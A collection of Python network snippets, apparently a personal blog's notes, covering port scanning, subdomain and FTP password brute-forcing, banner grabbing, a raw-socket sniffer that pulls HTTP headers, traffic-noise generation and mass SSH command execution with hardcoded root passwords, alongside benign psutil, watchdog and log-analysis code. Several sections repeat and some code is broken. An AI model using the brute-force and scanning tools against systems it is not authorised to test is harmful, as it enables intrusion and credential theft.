open("C:/mysql.log", "w")
exit()
簡單實現端口掃描
import socket
sk = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sk.settimeout(1)
for ip in range(0,254):
try:
sk.connect(("192.168.1."+str(ip),443))
print("192.168.1.%d server open \n"%ip)
except Exception:
print("192.168.1.%d server not open"%ip)
sk.close()
第二種簡單的實現端口掃描.
import socket
def PortScan(ip, port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip, port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip, port))
finally:
server.close()
if __name__ == '__main__':
host = '192.168.1.1'
for port in range(50, 1000):
PortScan(host, port)
import socket
port_number = [135,443,80]
for index in port_number:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('127.0.0.1', index))
if result == 0:
print("Port %d is open" % index)
else:
print("Port %d is not open" % index)
sock.close()
當然上面這兩種方式都是串行執行的,這在多IP多端口的情況下是非常慢得,所以引入多線程threading模塊
import threading
import socket
def PortScan(ip, port):
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
server.connect((ip, port))
print('{0} port {1} is open'.format(ip, port))
except Exception as err:
print('{0} port {1} is not open'.format(ip, port))
finally:
server.close()
if __name__ == '__main__':
host = '192.168.1.1'
threads = []
for port in range(20, 100):
t = threading.Thread(target=PortScan, args=(host, port))
t.start()
threads.append(t)
for t in threads:
t.join()
簡單實現批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
ret = subprocess.call("ping -w 500 -n 1 %s" %ip,stdout=subprocess.PIPE,shell=True)
if ret == 0:
hproc = subprocess.getoutput("ping "+ip)
ping = hproc.split("平均 = ")[1]
print("延時: {} 主機: {}".format(ping,ip))
else:
print("延時: {} 主機: {}".format("None", ip))
if __name__ == "__main__":
with open("ip.log","r") as f:
for i in f:
p = multiprocessing.Process(target=ping,args=(i,))
p.start()
獲取目標網頁容器信息
import os
import requests
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def GetTitle(domain):
try:
url="https://{}".format(domain)
ret = requests.get(url=url,headers=head,timeout=1)
title = re.findall("<title>.*</title>",ret.content.decode("utf-8"))
print("頁面標題:{}".format(str(title[0]).replace("<title>","").replace("</title>","")))
print("主機時間:{}".format(str(ret.headers["Date"])))
print("主機容器:{}".format(ret.headers["Server"]))
print("壓縮技術:{}".format(ret.headers["Content-Encoding"]))
print("Cxy_all:{}".format(ret.headers["Cxy_all"]))
print("Traceid:{}".format(ret.headers["Traceid"]))
except:
pass
if __name__ == "__main__":
GetTitle("baidu.cn")
獲取目標網站IP地址
import os
import socket
import re
def GetIPAddress(domain):
try:
sock = socket.getaddrinfo(domain,None)
ip = str(sock[0][4])
result = re.findall("(?:[0-9]{1,3}\.){3}[0-9]{1,3}", ip)
print(result[0])
except:
pass
if __name__ == "__main__":
GetIPAddress("www.163.com")
子域名爆破: 用於爆破網站中的一級域名,例如www等格式的域名.
import os
import requests
import linecache
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def VisitWeb(prefix,domain):
try:
url = "https://{}.{}".format(prefix,domain)
ret = requests.get(url=url, headers=head, timeout=1)
if(ret.status_code == 200):
return 1
else:
return 0
except:
return 0
def BlastWeb(domain,wordlist):
forlen = len(linecache.getlines(wordlist))
fp = open(wordlist,"r+")
for i in range(0,forlen):
main = str(fp.readline().split()[0])
if VisitWeb(main, domain) != 0:
print("旁站: {}.{} 存在".format(main,domain))
if __name__ == "__main__":
BlastWeb("baidu.com","./list.log")
FTP密碼爆破工具 可自行加上多線程支持,提高速度..
import ftplib
def Brutelogin(hostname,username,wordlist):
fp = open(wordlist,"r+")
for line in fp.readlines():
password = line.strip("\r").strip("\n")
print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print("\n[*] {} Login Succeeded.".format(password))
except:
pass
print("\n[-] Could not brubrute force FTP credentials.")
return(None,None)
Brutelogin("192.168.1.20","admin","./list.log")
簡單實現百度爬取
import sys,os,re
import requests
from bs4 import BeautifulSoup
head = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"}
#url = "https://www.baidu.com/s?wd=lyshark&pn=0"
url = "http://192.168.1.2/bd/"
ret = requests.get(url=url,headers=head)
soup = BeautifulSoup(ret.content,'lxml')
urls = soup.find_all(name='a',attrs={'data-click':re.compile(('.')),'class':None})
for item in urls:
get_url = requests.get(url=item['href'],headers=head,timeout=5)
if get_url.status_code == 200:
print(get_url.url)
實現動態進度條
import time,ctypes
def process_bar(percent, end_str=''):
bar = int(percent)
bar = '\r' + '[ {:0>0d} | '.format(percent) + end_str + " ]"
print(bar, end='', flush=True)
for i in range(101):
time.sleep(0.1)
end_str = '100'
process_bar(i, end_str=end_str)
獲取目標網頁容器信息
import os
import requests
import re
head={'user-agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
def GetTitle(domain):
try:
url="https://{}".format(domain)
ret = requests.get(url=url,headers=head,timeout=1)
title = re.findall("<title>.*</title>",ret.content.decode("utf-8"))
print("頁面標題:{}".format(str(title[0]).replace("<title>","").replace("</title>","")))
print("主機時間:{}".format(str(ret.headers["Date"])))
print("主機容器:{}".format(ret.headers["Server"]))
print("壓縮技術:{}".format(ret.headers["Content-Encoding"]))
print("Cxy_all:{}".format(ret.headers["Cxy_all"]))
print("Traceid:{}".format(ret.headers["Traceid"]))
except:
pass
if __name__ == "__main__":
GetTitle("baidu.cn")
獲取目標網站IP地址
import os
import socket
import re
def GetIPAddress(domain):
try:
sock = socket.getaddrinfo(domain,None)
ip = str(sock[0][4])
result = re.findall("(?:[0-9]{1,3}\.){3}[0-9]{1,3}", ip)
print(result[0])
except:
pass
if __name__ == "__main__":
GetIPAddress("www.163.com")
FTP密碼爆破工具 可自行加上多線程支持,提高速度..
import ftplib
def Brutelogin(hostname,username,wordlist):
fp = open(wordlist,"r+")
for line in fp.readlines():
password = line.strip("\r").strip("\n")
print("[+] Host:{} User:{} Paswd:{}".format(hostname,username,password))
try:
ftp = ftplib.FTP(hostname)
ftp.login(username,password)
print("\n[*] {} Login Succeeded.".format(password))
except:
pass
print("\n[-] Could not brubrute force FTP credentials.")
return(None,None)
Brutelogin("192.168.1.20","admin","./list.log")
簡單實現批量Ping
import multiprocessing
import sys,subprocess
def ping(ip):
ret = subprocess.call("ping -w 500 -n 1 %s" %ip,stdout=subprocess.PIPE,shell=True)
if ret == 0:
hproc = subprocess.getoutput("ping "+ip)
ping = hproc.split("平均 = ")[1]
print("延時: {} 主機: {}".format(ping,ip))
else:
print("延時: {} 主機: {}".format("None", ip))
if __name__ == "__main__":
with open("ip.log","r") as f:
for i in f:
p = multiprocessing.Process(target=ping,args=(i,))
p.start()
掃描目標主機 Banner: 為了讓函數獲得完整的屏幕控制權,這里使用一個信號量,它能夠阻止其他線程運行而避免出現多線程同時輸出造成的亂碼和失序等情況.
#coding=utf-8
from socket import *
from threading import *
#定義一個信號量
screenLock = Semaphore(value=1)
def ScanBanner(addr,port):
try:
conn = socket(AF_INET,SOCK_STREAM)
conn.connect((addr,port))
conn.send(bytes("hello lyshark\r\n",encoding="utf-8"))
res = conn.recv(200)
# 加鎖
screenLock.acquire()
print("[+] 主機: {} Banner: {}".format(addr,res))
except Exception:
# 加鎖
screenLock.acquire()
print("[-] 主機: {} 不存在或已經關閉.".format(addr))
pass
finally:
# 執行釋放鎖的操作
screenLock.release()
conn.close()
setdefaulttimeout(1)
for i in range(0,25):
a = "192.168.1.{}".format(i)
t = Thread(target=ScanBanner,args=(a,80))
t.start()
scapy實現ping
from scapy.all import *
from random import randint
import ipaddress,threading
def ping(host):
RandomID=randint(1,65534)
packet = IP(dst=host, ttl=64, id=RandomID) / ICMP(id=RandomID, seq=RandomID) / b"lyshark"
respon = sr1(packet,timeout=3)
if respon:
print(str(respon[IP].src))
if __name__=='__main__':
threads = []
net = ipaddress.ip_network("192.168.1.0/24")
for item in net:
threads.append(ping(item))
print(threads)
web容器識別
import re,requests
from bs4 import BeautifulSoup
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'}
def GetServerTitle(url):
Respon = requests.get(url=url,headers=header,timeout=5)
print("--" * 50)
print(url + " ",end="")
if Respon.status_code == 200:
RequestBody = [item for item in Respon.headers]
for item in ["Date","Server","X-Powered-By"]:
if item in RequestBody:
print(Respon.headers[item] + " ",end="")
else:
print("None" + " ",end="")
bs4 = BeautifulSoup(Respon.text,"html.parser")
print(bs4.find_all("title")[0])
print("--" * 50)
for i in range(1,10):
GetServerTitle("http://www.xxx.com")
多線程執行SSH的兩種方式
import paramiko,datetime,threading
class MyThread(threading.Thread):
def __init__(self,address,username,password,port,command):
super(MyThread, self).__init__()
self.address = address
self.username = username
self.password = password
self.port = port
self.command = command
def run(self):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(self.address, port=self.port, username=self.username, password=self.password, timeout=1)
stdin, stdout, stderr = ssh.exec_command(self.command)
result = stdout.read()
if not result:
self.result = stderr.read()
ssh.close()
self.result = result.decode()
except Exception:
self.result = "0"
def get_result(self):
try:
return self.result
except Exception:
return None
ThreadPool = [] # 定義線程池
starttime = datetime.datetime.now()
for item in range(5):
obj = MyThread("192.168.1.20","root","123","22","ifconfig")
ThreadPool.append(obj)
for item in ThreadPool:
item.start() # 啟動線程
item.join()
for item in ThreadPool:
ret = item.get_result() # 獲取返回結果
print(ret)
endtime = datetime.datetime.now()
print("程序開始運行:{} 結束:{}".format(starttime,endtime))
第二種方式
import paramiko,datetime,threading
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_shell(address,username,password,port,command):
try:
ssh.connect(address,port=port,username=username,password=password,timeout=1)
stdin, stdout, stderr = ssh.exec_command(command)
result = stdout.read()
if not result:
result=stderr.read()
ssh.close()
return result.decode()
except Exception:
return "0"
class MyThread(threading.Thread):
def __init__(self,func,args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
ThreadPool = [] # 定義線程池
starttime = datetime.datetime.now()
for item in range(10):
obj = MyThread(func=ssh_shell,args=("192.168.1.20","root","123","22","pwd"))
ThreadPool.append(obj)
for item in ThreadPool:
item.start()
item.join()
for item in ThreadPool:
ret = item.get_result() # 獲取返回結果
print(ret)
endtime = datetime.datetime.now()
print("程序開始運行:{} 結束:{}".format(starttime,endtime))
web頁面探測工具 探測頁面健康狀態
import pycurl,certifi
from io import BytesIO
headers = ['Accept:*/*','User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0']
def header_function(header_line):
header_line = header_line.decode("utf-8")
#print(header_line.split(":"))
class ex_response(object):
def __init__(self,url):
self.buffer = BytesIO() # 創建緩存對象
self.c = pycurl.Curl() # 創建curl實例
self.c.setopt(pycurl.URL,url) # 設置資源路徑
self.c.setopt(pycurl.CAINFO,certifi.where()) # 設置指定證書驗證包
self.c.setopt(pycurl.WRITEDATA, self.buffer)
self.c.setopt(pycurl.WRITEHEADER,self.buffer)
self.c.setopt(self.c.HTTPHEADER,headers) # 設置HTTP頭
self.c.setopt(pycurl.HEADERFUNCTION, header_function) # 調用外部函數
try:
self.c.perform()
except Exception:
self.buffer.close()
self.c.close()
def getinfo(self):
h1 = self.c.getinfo(pycurl.HTTP_CODE) # 狀態碼
h2 = self.c.getinfo(pycurl.TOTAL_TIME) # 傳輸結束總消耗時間
h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME) # DNS解析時間
h4 = self.c.getinfo(pycurl.CONNECT_TIME) # 建立連接時間
h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME) # 建立連接到准備傳輸消耗時間
h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) # 從建立連接到傳輸開始消耗時間
h7 = self.c.getinfo(pycurl.REDIRECT_TIME) # 重定向消耗時間
h8 = self.c.getinfo(pycurl.SIZE_UPLOAD) # 上傳數據包大小
h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD) # 下載數據包大小
h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD) # 平均下載速度
h11 = self.c.getinfo(pycurl.SPEED_UPLOAD) # 平均上傳速度
h12 = self.c.getinfo(pycurl.HEADER_SIZE) # http頭文件大小
info ='''
http狀態碼:%s
傳輸結束總時間:%.2f ms
DNS解析時間:%.2f ms
建立連接時間:%.2f ms
准備傳輸時間:%.2f ms
傳輸開始時間:%.2f ms
重定向時間:%.2f ms
上傳數據包大小:%d bytes/s
下載數據包大小:%d bytes/s
平均下載速度:%d bytes/s
平均上傳速度:%d bytes/s
http頭文件大小:%d byte
''' %(h1,h2*1000,h3*1000,h4*1000,h5*1000,h6*1000,h7*1000,h8,h9,h10,h11,h12)
print(info)
self.buffer.close()
self.c.close()
if __name__ == "__main__":
curl_respon = ex_response("https://www.baidu.com")
curl_respon.getinfo()
內網流量混淆
import requests
import random
import time
import threading
header = {'user-agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120'}
url = [
"https://www.baidu.com",
"https://voice.baidu.com/act/newpneumonia/newpneumonia/",
"https://http://news.baidu.com/",
"https://tieba.baidu.com/",
"https://map.baidu.com/",
"https://im.qq.com/"
]
def tstart():
while True:
try:
u = random.choice(url)
Respon = requests.get(url=u,headers=header,timeout=1)
if Respon.status_code == 200:
print("{} ok".format(u))
else:
print("{} error".format(u))
except Exception:
pass
t = threading.Thread(target=tstart)
t.start()
t1 = threading.Thread(target=tstart)
t1.start()
t2 = threading.Thread(target=tstart)
t2.start()
psutils 使用該模塊完成遍歷。
import psutil
# 獲取到網卡的出口入口流量信息
def GetNetwork():
network = psutil.net_io_counters(pernic=True,nowrap=True)
for each in network.keys():
print("[*] 網卡: %-35s 發送/接收字節: %s/%s 發送/接收包數量: %s/%s"
%(each,network[each].bytes_sent,network[each].bytes_recv,
network[each].packets_sent,network[each].packets_recv))
# 獲取到當前電腦中的網絡連接狀態: tcp tcp4 tcp6 udp inet4 inet6
def GetNetworkLink():
network = psutil.net_connections(kind="tcp")
AllowData = []
for each in network:
src_addr,src_port = each.laddr.ip,each.laddr.port
src_stats = each.status
src_pid = each.pid
if src_stats in ["ESTABLISHED","LISTEN"]:
process = psutil.Process(src_pid)
print("[+] IP地址: %15s:%-5s PID: %5s 名稱: %-10s"
%(src_addr,src_port,src_pid,process.name()))
AllowData.append([process.name(),src_port])
return AllowData
# 遍歷整個系統中所有進程PID並取出關鍵數據
def GetProcessID():
for each in psutil.pids():
p = psutil.Process(int(each))
print("-" * 100)
print("進程: %25s 線程數: %5s 內存利用率:%3s 進程創建時間: %-20s"
%(p.name(),p.num_threads(),int(p.memory_percent()),p.create_time()))
print("-" * 100)
print("CPU時間信息: {}".format(p.cpu_times()))
print("MEM內存信息: {}".format(p.memory_info()))
print("進程IO讀寫參數: {}".format(p.io_counters()))
print("進程對外SOCKET: {}".format(p.connections()))
print("\r"*100)
以下代碼是從網上爬的,收藏了。
In [25]: import psutil
In [26]: from pprint import pprint as pp
#根據進程名查看系統中的進程名與pid
In [27]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'python
...: ' in p.info['name']])
[{'name': 'ipython3', 'pid': 2429}]
In [28]: pp([p.info for p in psutil.process_iter(attrs=['pid','name']) if 'mysql'
...: in p.info['name']])
[{'name': 'mysqld_safe', 'pid': 987}, {'name': 'mysqld', 'pid': 1265}]
#所有用戶進程
In [32]: import getpass
In [33]: pp([(p.pid,p.info['name']) for p in psutil.process_iter(attrs=['name','u
...: sername']) if p.info['username'] == getpass.getuser()])
[(1, 'systemd'),
(2, 'kthreadd'),
(3, 'ksoftirqd/0'),
(5, 'kworker/0:0H'),
(6, 'kworker/u256:0'),
...
(5004, 'kworker/0:0')]
#查看積極運行的進程:
In [37]: pp([(p.pid,p.info) for p in psutil.process_iter(attrs=['name','status'])
...: if p.info['status'] == psutil.STATUS_RUNNING])
[(2429, {'name': 'ipython3', 'status': 'running'})]
#使用日志文件的進程
In [38]: import os,psutil
In [39]: for p in psutil.process_iter(attrs=['name','open_files']):
...: for file in p.info['open_files'] or []:
...: if os.path.splitext(file.path)[1] == '.log':
...: print("%-5s %-10s %s" % (p.pid,p.info['name'][:10],file.path
...: ))
...:
auditd /var/log/audit/audit.log
vmtoolsd /var/log/vmware-vmsvc.log
tuned /var/log/tuned/tuned.log
#消耗超過5M內存的進程:
In [42]: pp([(p.pid,p.info['name'],p.info['memory_info'].rss) for p in psutil.pro
...: cess_iter(attrs=['name','memory_info']) if p.info['memory_info'].rss > 5
...: * 1024 * 1024])
[(1, 'systemd', 7118848),
(411, 'systemd-udevd', 6254592),
(712, 'polkitd', 13553664),
(716, 'abrtd', 5734400),
(724, 'VGAuthService', 6262784),
(725, 'vmtoolsd', 6426624),
(974, 'tuned', 19648512),
(1265, 'mysqld', 45268992),
(2204, 'sshd', 5726208),
(2429, 'ipython3', 37232640)]
#消耗量最大的3個進程
In [43]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: memory_percent']), key=lambda p: p.info['memory_percent'])][-3:])
[(974, {'memory_percent': 0.9451434561080659, 'name': 'tuned'}),
(2429, {'memory_percent': 1.7909847854955845, 'name': 'ipython3'}),
(1265, {'memory_percent': 2.177553778800572, 'name': 'mysqld'})]
#消耗最多CPU時間的前3個進程
In [44]: pp([(p.pid, p.info['name'], sum(p.info['cpu_times'])) for p in sorted(ps
...: util.process_iter(attrs=['name', 'cpu_times']), key=lambda p: sum(p.info
...: ['cpu_times'][:2]))][-3:])
[(1265, 'mysqld', 13.93),
(2429, 'ipython3', 14.809999999999999),
(725, 'vmtoolsd', 16.74)]
#導致最多I/O的前3個進程
In [45]: pp([(p.pid, p.info['name']) for p in sorted(psutil.process_iter(attrs=['
...: name', 'io_counters']), key=lambda p: p.info['io_counters'] and p.info['
...: io_counters'][:2])][-3:])
[(2429, 'ipython3'), (725, 'vmtoolsd'), (1, 'systemd')]
#前3個進程打開最多的文件描述符:
In [46]: pp([(p.pid, p.info) for p in sorted(psutil.process_iter(attrs=['name', '
...: num_fds']), key=lambda p: p.info['num_fds'])][-3:])
[(377, {'name': 'systemd-journald', 'num_fds': 24}),
(1, {'name': 'systemd', 'num_fds': 43}),
(1307, {'name': 'master', 'num_fds': 91})]
watchdog 文件目錄實時 監控文件變化。
from watchdog.observers import Observer
from watchdog.events import *
import time
class FileEventHandler(FileSystemEventHandler):
def __init__(self):
FileSystemEventHandler.__init__(self)
def on_moved(self, event):
if event.is_directory:
print("目錄 {0} 更改為 {1}".format(event.src_path,event.dest_path))
else:
print("文件 {0} 更改為 {1}".format(event.src_path,event.dest_path))
def on_created(self, event):
if event.is_directory:
print("目錄被創建:{0}".format(event.src_path))
else:
print("文件被創建:{0}".format(event.src_path))
def on_deleted(self, event):
if event.is_directory:
print("目錄被刪除:{0}".format(event.src_path))
else:
print("文件被刪除:{0}".format(event.src_path))
def on_modified(self, event):
if event.is_directory:
print("目錄被更改:{0}".format(event.src_path))
else:
print("文件被更改:{0}".format(event.src_path))
if __name__ == "__main__":
observer = Observer()
event_handler = FileEventHandler()
observer.schedule(event_handler,"Z:\MyWeb",True)
observer.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
observer.stop()
observer.join()
python HTTP/HTTPS 代理轉發
from wsgiref.simple_server import make_server
import requests
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
rHost = environ["HTTP_HOST"]
sub = rHost.split(".")[0]
if sub == "lyshark":
response = requests.get(url="http://www.baidu.com",timeout=10)
by = bytes(response.text,encoding="utf-8")
# HTTP_USER_AGENT
# REQUEST_METHOD
# PATH_INFO
return [by,]
response = b"<b> 404 not found </b>"
return [response,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
print("[*] 服務已啟動 0.0.0.0:80")
httpd.serve_forever()

稍微改一改,變成負載均衡,作孽啊。
from wsgiref.simple_server import make_server
import requests,random
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
rHost = environ["HTTP_HOST"]
sub = rHost.split(".")[0]
a = ["http://192.168.1.10","http://192.168.1.20"]
print(rHost,sub)
response = requests.post(url=random.choice(a),timeout=10)
by = bytes(response.text,encoding="utf-8")
return [by,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
httpd.serve_forever()

python 解碼IP層 混雜模式,抓包,解碼自己搞吧。
import os,socket,struct
from ctypes import *
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_protocol)
sniffer.bind(("192.168.1.2",0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
print(raw_buffer.decode('utf-8','ignore'))

強大的過濾系統
import os,socket,struct
from ctypes import *
socket_protocol = socket.IPPROTO_IP
sniffer = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_protocol)
sniffer.bind(("192.168.1.2",0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
string = str(raw_buffer.decode('utf-8','ignore')).splitlines()
for each,item in zip(string,range(0,len(string))):
if each.find('Host') >= 0:
print("------------------------------------------------------------")
print(each)
elif each.find('Referer') >=0:
print(each)
elif each.find('Accept') >=0:
print(each)

列表生成式
'''
aa = [x for x in os.listdir(di) if os.path.splitext(x)[1] == ".png"]
pen = []
print(aa)
for i in aa:
dd = di+i
print("[+] dirname: {} {}".format(dd,os.stat(dd).st_size))
pen.append(os.stat(dd).st_size)
print(pen)
'''
python web 服務器本質: jinja.html
<body>
<h1>{{name}}</h1>
<ul>
{% for item in user_list %}
<li>{{item}}</li>
{% endfor %}
</ul>
</body>
main.py
from wsgiref.simple_server import make_server
from jinja2 import Template
def index():
with open("./index.html","r",encoding="utf-8")as fp:
recv = fp.read()
return recv.encode("utf-8")
def jinja():
with open("./jinja.html","r",encoding="utf-8")as fp:
data = fp.read()
template = Template(data)
recv = template.render(name='John Doe', user_list=['alex', 'eric'])
return recv.encode("utf-8")
url_func = [
('/index/',index),('/jinja/',jinja)]
def RunServer(environ,star_response):
star_response("200 OK",[('Content-Type','text/html;charset=urf-8')])
url = environ["PATH_INFO"]
rAddr = environ["REMOTE_ADDR"]
rHost = environ["HTTP_HOST"]
print("[+] 根域名: {} 路徑: {} 目標IP: {}".format(rHost,url,rAddr))
func = None
for i in url_func:
if i[0] == url:
func = i[1]
break
if func:
response = func()
else:
response = b"<b> 404 not found </b>"
return [response,]
if __name__ == "__main__":
httpd = make_server("0.0.0.0",8080,RunServer)
print("[*] 服務已啟動 0.0.0.0:80")
httpd.serve_forever()
運行后,訪問魔板頁面,完成頁面渲染。

python 打包 執行 python setup.py build
import sys
from cx_Freeze import setup, Executable
base = None
if sys.platform == "win32":
base = "Win32GUI"
setup( name = "MyApp",
version = "0.1",
description = "My python",
executables = [Executable("daili.py", base=base)]
)
動態進度: 改版后,可實現msf同款效果。
import time,random
def DynamicBar(scale,sleep):
for item in range(scale+1):
StartProgress = item * "#"
EndProgress = (scale-item) * "."
Count = (item/scale) * 100
dur = time.perf_counter()
print("\r{:^3.0f}%[ {}->{} ]{:.2f}s".format(Count, StartProgress, EndProgress, dur), end="")
time.sleep(1)
if __name__ == "__main__":
os.system("cls")
banner = '''
__ __ __
/ | / | / |
$$ | __ __ _______ $$ |____ ______ ______ $$ | __
$$ |/ | / | / |$$ \ / \ / \ $$ | / |
$$ |$$ | $$ |/$$$$$$$/ $$$$$$$ | $$$$$$ |/$$$$$$ |$$ |_/$$/
$$ |$$ | $$ |$$ \ $$ | $$ | / $$ |$$ | $$/ $$ $$<
$$ |$$ \__$$ | $$$$$$ |$$ | $$ |/$$$$$$$ |$$ | $$$$$$ \
$$ |$$ $$ |/ $$/ $$ | $$ |$$ $$ |$$ | $$ | $$ |
$$/ $$$$$$$ |$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$/ $$/
/ \__$$ |
$$ $$/
$$$$$$/
'''
print(banner)
DynamicString("hello lyshark this is a test case wwa sdfw rtis aos")

圖片轉為字符圖片:
from PIL import Image
def get_char(r,g,b,alpha = 256):
ascii_char = list("~!@#$%^&*()_+ ")
if alpha == 0:
return " "
length = len(ascii_char)
gray = int(0.2126 * r + 0.7152 * g + 0.0722 * b)
unit = (256.0 + 1)/length
return ascii_char[int(gray/unit)]
if __name__ == "__main__":
if args.file != None:
img = Image.open(args.file)
img = img.resize((args.width,args.height), Image.NEAREST)
txt = ""
for row in range(args.height):
for cow in range(args.width):
txt += get_char(*img.getpixel((cow,row)))
txt += "\n"
print(txt)

Python 實現的自動化服務器管理
import sys
import os
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
def ssh_cmd(user,passwd,port,userfile,cmd):
check_ok=[]
check_er=[]
file = open(userfile, "r")
line = file.readlines()
file.close()
for i in range(len(line)):
print("-------------------------------------------->" + line[i].strip('\n') + "<--------------------------------------------\n" )
try:
ssh.connect(hostname=line[i].strip('\n'),port=port,username=user,password=passwd)
cmd=cmd
stdin, stdout, stderr = ssh.exec_command(cmd)
result = stdout.read()
if not result:
result=stderr.read()
ssh.close()
print(result.decode())
check_ok.append(line[i].strip('\n'))
except Exception:
check_er.append(line[i].strip('\n'))
continue
print("\n\n\n--------------------------------------------------------------------------------------------------------")
print("主機IP\t\t\t端口\t\t\t命令\t\t\t狀態\t\t\t")
print("--------------------------------------------------------------------------------------------------------")
for i in range(len(check_ok)):
print(check_ok[i] + "\t\t"+port+"\t\t\t"+cmd+"\t\t[完成]")
for i in range(len(check_er)):
print(check_er[i] + "\t\t"+ port +"\t\t\t"+ cmd +"\t\t[失敗]")
print("--------------------------------------------------------------------------------------------------------")
def ssh_put(user,passwd,source,target):
check_ok=[]
check_er=[]
file=open("./ip.txt","r")
line=file.readlines()
file.close()
for i in range(len(line)):
print("============================================>" + line[i].strip('\n') + "<============================================" )
try:
transport = paramiko.Transport((line[i].strip('\n'), 22))
transport.connect(username=user, password=passwd)
sftp = paramiko.SFTPClient.from_transport(transport)
sftp.put(source, target)
check_ok.append(line[i].strip('\n'))
except Exception:
check_er.append(line[i].strip('\n'))
continue
print("\n\n\n--------------------------------------------------------------------------------------------------------")
print("主機IP\t\t\t端口\t\t\t傳輸源\t\t傳輸到\t\t 狀態 \n")
print("--------------------------------------------------------------------------------------------------------")
for i in range(len(check_ok)):
print(check_ok[i] + "\t\t" + "22" + "\t\t" + source + "\t\t" + target + "\t\t" + "[完成]")
for i in range(len(check_er)):
print(check_er[i] + "\t\t" + "22" + "\t\t" + source + "\t\t" + target + "\t\t" + "[失敗]")
print("--------------------------------------------------------------------------------------------------------")
while True:
try:
shell=str(input("[Shell] # "))
if (shell == ""):
continue
elif (shell == "exit"):
exit()
elif (shell == "put"):
ssh_put("root","123123","./a.py","/root/a.py")
elif (shell =="cron"):
temp=input("輸入一個計划任務: ")
temp1="(crontab -l; echo "+ temp + ") |crontab"
ssh_cmd("root","123123","22","./user_ip.conf",temp1)
elif (shell == "uncron"):
temp=input("輸入要刪除的計划任務: ")
temp1="crontab -l | grep -v \" "+ temp + "|crontab"
ssh_cmd("root","123123","22","./user_ip.conf",temp1)
else:
ssh_cmd("lyshark","123123","22","./user_ip.conf",shell)
except Exception:
continue
統計access日志: 殘廢版。
import os,sys,re
lis = {}
ls = []
with open("c://access.log","r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
if data >="11/Apr/2020:07:03:56" and data <= "17/Mar/2020:14:16:25":
t = each.split("(")[1]
t1 = re.sub("\;.*$|\)|\(","",t)
ls.append(t1)
except Exception:
pass
list_count = []
list_num = set(ls)
for item in list_num:
num = ls.count(item)
lis[item] = num
print(lis)
erdai
import os,sys,re,time,datetime
from matplotlib.pylab import *
def Count_Equipment(log_name,start_time,end_time):
Agent = []
with open(log_name,"r",encoding="utf-8") as fp:
for each in fp.readlines():
try:
data = each.split()[3][1:]
print(data.split(":")[0])
if data >="11/Apr/2020:07:03:56" and data <= "17/Mar/2020:14:16:25":
Agent.append(each.split()[13].replace("\n",""))
except Exception:
pass
dic,list_num = {},set(Agent)
for item in list_num:
num = Agent.count(item)
dic[item] = num
# 針對字典中的鍵值對進行排序,大的在前小的在后
di = sorted(dic.items(),key=lambda x:x[1],reverse=True)
news = di[0:10:1] # 取前兩個大的
dic_news = dict(news)
x,y = [],[]
for k in dic_news:
x.append(k)
y.append(dic_news[k])
plt.rcParams["font.sans-serif"] = ["KaiTi"]
plt.title("訪問設備類型前10")
plt.xticks(rotation=70)
for a,b in zip(x,y):
plt.text(a, b, '%.0f' % b, ha='center', va= 'bottom',fontsize=7)
plt.bar(x,y)
plt.legend()
plt.show()
